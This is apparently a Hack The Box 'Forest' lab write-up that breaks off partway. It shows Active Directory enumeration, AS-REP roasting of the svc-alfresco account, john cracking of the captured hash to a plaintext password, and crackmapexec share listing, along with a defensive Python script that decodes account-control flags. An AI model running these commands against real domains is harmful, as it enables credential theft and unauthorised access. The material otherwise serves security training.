Forest
Scanning
# Nmap 7.94 scan initiated Wed Jul 19 11:48:51 2023 as: nmap -sCV -A -p 53,88,135,139,389,464,593,636,3268,3269,5985,9389,445,47001,49664,49665,49666,49667,49676,49671,49677,49684,49703 -vvv -T4 -oN nmap.log 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up, received conn-refused (0.25s latency).
Scanned at 2023-07-19 11:48:52 IST for 80s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-07-19 06:25:49Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49671/tcp open msrpc syn-ack Microsoft Windows RPC
49676/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc syn-ack Microsoft Windows RPC
49684/tcp open msrpc syn-ack Microsoft Windows RPC
49703/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2023-07-18T23:26:41-07:00
| smb2-time:
| date: 2023-07-19T06:26:42
|_ start_date: 2023-07-19T06:22:40
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 32753/tcp): CLEAN (Couldn't connect)
| Check 2 (port 62778/tcp): CLEAN (Couldn't connect)
| Check 3 (port 44587/udp): CLEAN (Failed to receive data)
| Check 4 (port 12952/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 2h26m49s, deviation: 4h02m30s, median: 6m48s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 19 11:50:12 2023 -- 1 IP address (1 host up) scanned in 80.54 seconds
Enumeration
LDAP
nmap --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' -p 389 10.10.10.161
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-19 12:03 IST
Nmap scan report for htb.local (10.10.10.161)
Host is up (0.24s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-brute:
| cn=root,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=admin,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=administrator,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=webadmin,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=sysadmin,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=netadmin,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=guest,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=user,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=web,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
|_ cn=test,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
389/tcp open ldap
| ldap-search:
| Context: DC=htb,DC=local
| dn: DC=htb,DC=local
| objectClass: top
| objectClass: domain
| objectClass: domainDNS
| distinguishedName: DC=htb,DC=local
| instanceType: 5
| whenCreated: 2019/09/18 17:45:49 UTC
| whenChanged: 2023/07/19 06:22:30 UTC
| subRefs: DC=ForestDnsZones,DC=htb,DC=local
| subRefs: DC=DomainDnsZones,DC=htb,DC=local
| subRefs: CN=Configuration,DC=htb,DC=local
| uSNCreated: 4099
| dSASignature: \x01\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\xA3k#YyAJ\xB9Y_\x82h\x9A\x08q
| uSNChanged: 888873
| name: htb
| objectGUID: dff0c71a-49a9-264b-8c7b-52e3e2cb6eab
| creationTime: 133342213503996465
| forceLogoff: -9223372036854775808
| lockoutDuration: -18000000000
| lockOutObservationWindow: -18000000000
| lockoutThreshold: 0
| maxPwdAge: -9223372036854775808
| minPwdAge: -864000000000
No interesting information here: the search base dc=cqure,dc=net is the example value from the script's documentation, not this domain, and binding with an empty password is an unauthenticated bind that the DC accepts for any DN, so the "Valid credentials" lines are false positives.
SMB
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jul 19 11:51:51 2023
=========================================( Target Information )=========================================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.10.161 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.10.161 )================================
Looking up status of 10.10.10.161
No reply from 10.10.10.161
===================================( Session Check on 10.10.10.161 )===================================
[+] Server 10.10.10.161 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.10.161 )================================
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.10.161 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.10.161 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=======================================( Users on 10.10.10.161 )=======================================
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: Administrator Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1 Name: HealthMailbox-EXCH01-010 Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e Name: HealthMailbox-EXCH01-003 Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678 Name: HealthMailbox-EXCH01-005 Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e Name: HealthMailbox-EXCH01-009 Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781 Name: HealthMailbox-EXCH01-006 Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d Name: HealthMailbox-EXCH01-004 Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64 Name: HealthMailbox-EXCH01-008 Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9 Name: HealthMailbox-EXCH01-002 Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722 Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013 Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad Name: HealthMailbox-EXCH01-001 Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238 Name: HealthMailbox-EXCH01-007 Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda Name: Lucinda Berger Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark Name: Mark Brandt Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb Name: Microsoft Exchange Migration Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb Name: Microsoft Exchange Approval Assistant Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18 Name: Discovery Search Mailbox Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a Name: Microsoft Exchange Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb Name: E4E Encryption Store - Active Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549 Name: Microsoft Exchange Federation Mailbox Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b Name: Microsoft Exchange Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b Name: Microsoft Exchange Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
=================================( Share Enumeration on 10.10.10.161 )=================================
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.161
============================( Password Policy Information for 10.10.10.161 )============================
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.10.161)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HTB
[+] Builtin
[+] Password Info for Domain: HTB
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
=======================================( Groups on 10.10.10.161 )=======================================
[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]
[+] Getting builtin group memberships:
Group: 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group: 'Guests' (RID: 546) has member: Couldn't lookup SIDs
Group: 'Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group: 'Administrators' (RID: 544) has member: Couldn't lookup SIDs
Group: 'Account Operators' (RID: 548) has member: Couldn't lookup SIDs
Group: 'IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group: 'System Managed Accounts Group' (RID: 581) has member: Couldn't lookup SIDs
Group: 'Users' (RID: 545) has member: Couldn't lookup SIDs
Group: 'Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group: 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group: 'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$
Group: 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers
Group: 'Domain Users' (RID: 513) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
Group: 'Domain Users' (RID: 513) has member: HTB\krbtgt
Group: 'Domain Users' (RID: 513) has member: HTB\$331000-VK4ADACQNUCA
Group: 'Domain Users' (RID: 513) has member: HTB\SM_2c8eef0a09b545acb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_ca8c2ed5bdab4dc9b
Group: 'Domain Users' (RID: 513) has member: HTB\SM_75a538d3025e4db9a
Group: 'Domain Users' (RID: 513) has member: HTB\SM_681f53d4942840e18
Group: 'Domain Users' (RID: 513) has member: HTB\SM_1b41c9286325456bb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_9b69f1b9d2cc45549
Group: 'Domain Users' (RID: 513) has member: HTB\SM_7c96b981967141ebb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_c75ee099d0a64c91b
Group: 'Domain Users' (RID: 513) has member: HTB\SM_1ffab36a2f5f479cb
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc3d7722
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfc9daad
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc0a90c9
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox670628e
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox968e74d
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox6ded678
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox83d6781
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfd87238
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxb01ac64
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox7108a4e
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox0659cc1
Group: 'Domain Users' (RID: 513) has member: HTB\sebastien
Group: 'Domain Users' (RID: 513) has member: HTB\lucinda
Group: 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group: 'Domain Users' (RID: 513) has member: HTB\andy
Group: 'Domain Users' (RID: 513) has member: HTB\mark
Group: 'Domain Users' (RID: 513) has member: HTB\santi
Group: 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group: '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$
Group: 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group: 'Domain Computers' (RID: 515) has member: HTB\EXCH01$
Group: 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group: 'Domain Guests' (RID: 514) has member: HTB\Guest
Group: 'Schema Admins' (RID: 518) has member: HTB\Administrator
Group: 'Domain Admins' (RID: 512) has member: HTB\Administrator
Group: 'Exchange Windows Permissions' (RID: 1121) has member: HTB\Exchange Trusted Subsystem
Group: 'Organization Management' (RID: 1104) has member: HTB\Administrator
Group: 'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator
Group: 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
Group: 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
==================( Users on 10.10.10.161 via RID cycling (RIDS: 500-550,1000-1050) )==================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
===============================( Getting printer info for 10.10.10.161 )===============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Wed Jul 19 12:00:11 2023
We got a bunch of users, so let's try AS-REP roasting them
impacket-GetNPUsers htb.local/ -no-pass -usersfile out -dc-ip 10.10.10.161 | tee loot
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox6ded678 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:7980549e1883243c8222bdc0ac7226ab$3b937543e3b3e82114d0472b3356c9fbb685ad81824c112872a262a72add2ea3950ac5815cc4b2fba4a3015
d94d37f468085f93c6956fd1d003831d0cf0faadc3bb529db22f5463d2e1c002425230d400363205ce32ab0045460c7af4de27a143cfda48b59542933b776de73eb322115d5045ad087cc7ed68ab6
26d4c01a2694db306c3ef2aab3fd860f27948bfc461246f3bf6cd7a9c1649360cc1a754d7c3d166c677f6169080531877a66e0aa31cd8c59316f1db19e908ef994a46699a9cd8ea9941b2403bf21c
f43a1a34ef0f9e4369f666a40040ee73d9ed4ccdc73e952efb303f2170c
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
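Why only svc-alfresco produced a hash, and why exactly 13 accounts answered KDC_ERR_CLIENT_REVOKED, was already visible in the acb field of the enum4linux user listing above: bit 0x00010000 is ACB_DONT_REQUIRE_PREAUTH (set only on svc-alfresco, acb 0x00010210) and bit 0x00000001 is ACB_DISABLED (set on krbtgt, Guest, DefaultAccount, $331000-VK4ADACQNUCA and the nine SM_ mailboxes, which are the 13 revoked ones). The decoder below is an added example, not part of the original writeup; it works on a constructed six-line sample copied from that listing, and the flag names follow MS-SAMR section 2.2.1.13.

```python
import re

# SAMR USER_ACCOUNT control ("acb") bits, MS-SAMR section 2.2.1.13.
ACB_FLAGS = {
    0x00000001: "DISABLED",
    0x00000002: "HOMDIRREQ",
    0x00000004: "PWNOTREQ",
    0x00000008: "TEMPDUP",
    0x00000010: "NORMAL",
    0x00000020: "MNS",
    0x00000040: "DOMTRUST",
    0x00000080: "WSTRUST",
    0x00000100: "SVRTRUST",
    0x00000200: "PWNOEXP",
    0x00000400: "AUTOLOCK",
    0x00000800: "ENC_TXT_PWD_ALLOWED",
    0x00001000: "SMARTCARD_REQUIRED",
    0x00002000: "TRUSTED_FOR_DELEGATION",
    0x00004000: "NOT_DELEGATED",
    0x00008000: "USE_DES_KEY_ONLY",
    0x00010000: "DONT_REQUIRE_PREAUTH",
    0x00020000: "PW_EXPIRED",
    0x00040000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x00080000: "NO_AUTH_DATA_REQD",
    0x00100000: "PARTIAL_SECRETS_ACCOUNT",
    0x00200000: "USE_AES_KEYS",
}
ACB_DISABLED, ACB_DONT_REQUIRE_PREAUTH = 0x00000001, 0x00010000

# Constructed sample: six lines copied from the enum4linux user listing above.
SAMPLE = """\
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: Administrator Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
"""

USER_LINE = re.compile(r"RID:\s*0x[0-9a-f]+\s+acb:\s*(0x[0-9a-f]+)\s+Account:\s*(\S+)", re.I)


def decode_acb(acb: int) -> list[str]:
    """Names of the ACB bits set in `acb`, lowest bit first; unknown bits kept as hex."""
    names = [name for bit, name in sorted(ACB_FLAGS.items()) if acb & bit]
    unknown = acb & ~sum(ACB_FLAGS)  # sum of the keys == OR of all known bits
    if unknown:
        names.append(f"UNKNOWN(0x{unknown:08x})")
    return names


def parse_users(text: str) -> dict[str, int]:
    """Map account name -> acb value for every user line in enum4linux output."""
    return {m.group(2): int(m.group(1), 16) for m in USER_LINE.finditer(text)}


def kerberos_exposure(users: dict[str, int]) -> dict[str, str]:
    """Predict how the KDC answers an AS-REQ for each account: a disabled account
    yields KDC_ERR_CLIENT_REVOKED, an account with DONT_REQUIRE_PREAUTH returns a
    crackable AS-REP to an unauthenticated client, everything else needs pre-auth."""
    verdicts = {}
    for name, acb in users.items():
        if acb & ACB_DISABLED:
            verdicts[name] = "disabled (KDC_ERR_CLIENT_REVOKED)"
        elif acb & ACB_DONT_REQUIRE_PREAUTH:
            verdicts[name] = "pre-auth disabled (AS-REP roastable; re-enable pre-auth)"
        else:
            verdicts[name] = "pre-auth required"
    return verdicts


if __name__ == "__main__":
    users = parse_users(SAMPLE)
    for name, verdict in kerberos_exposure(users).items():
        print(f"{name:22} 0x{users[name]:08x}  {' | '.join(decode_acb(users[name])):42} {verdict}")
```

On the defending side the same check over a full listing (or over userAccountControl pulled via LDAP) is how you find accounts with "Do not require Kerberos preauthentication" set before someone else does.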
Cracking the user's AS-REP hash (krb5asrep format) using john
john loot --wordlist=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:02 DONE (2023-07-19 12:08) 0.3649g/s 1491Kp/s 1491Kc/s 1491KC/s s4ls469..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Let's enumerate the shares again via cme, this time with the cracked credentials
crackmapexec smb 10.10.10.161 -u 'svc-alfresco' -p 's3rvice' --shares
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [+] htb.local\svc-alfresco:s3rvice
SMB 10.10.10.161 445 FOREST [+] Enumerated shares
SMB 10.10.10.161 445 FOREST Share Permissions Remark
SMB 10.10.10.161 445 FOREST ----- ----------- ------
SMB 10.10.10.161 445 FOREST ADMIN$ Remote Admin
